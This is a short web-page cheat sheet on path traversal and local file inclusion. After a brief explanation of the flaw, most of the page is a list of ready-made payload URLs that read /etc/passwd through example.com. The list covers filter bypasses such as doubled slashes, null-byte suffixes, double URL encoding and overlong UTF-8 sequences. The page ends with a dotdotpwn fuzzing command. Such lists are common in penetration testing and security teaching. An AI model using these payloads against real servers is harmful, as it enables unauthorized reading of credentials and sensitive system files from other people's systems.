Path traversal is also known as directory traversal. These vulnerabilities enable an attacker to read arbitrary files on the server that is running an application. This might include:
Application code and data.
Credentials for back-end systems.
Sensitive operating system files.
Basic LFI and bypasses
Copy http://example.com/home.php?id=../../../etc/passwd
http://example.com/home.php?id=....//....//....//etc/passwd
http://example.com/home.php?id=..///////..////..//////etc/passwd
http://example.com/home.php?id=....//....//....//etc/passwd
http://example.com/home.php?id=....\/....\/....\/etc/passwd
http://example.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
http://example.com/home.php?id=/var/www/../../etc/passwd Null Byte
Bypass by appending additional characters to the end of the provided string (bypassing: $_GET['param']."php")
Copy http://example.com/home.php?id=../../../../etc/passwd%00
http://example.com/home.php?id=../../../../etc/passwd%00.jpg (append needed extension) This is solved since PHP 5.4
Encoding
You could use non-standard encondings like double URL encode:
Copy http://example.com/home.php?id=..%252f..%252f..%252fetc%252fpasswd
http://example.com/home.php?id=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/home.php?id=%252e%252e%252fetc%252fpasswd
http://example.com/home.php?id=%252e%252e%252fetc%252fpasswd%00
http://example.com/home.php?id=%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%2fpasswd From existent folder
It's possible that the back-end is verifying the folder path:
Copy http://example.com/home.php?id=utils/scripts/../../../../../etc/passwd Tools
It's a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc.
Copy sudo ./dotdotpwn.pl -m http-url -u https://example.com/image?id=TRAVERSAL -O -k "root:" Wordlists
Last updated 5 months ago
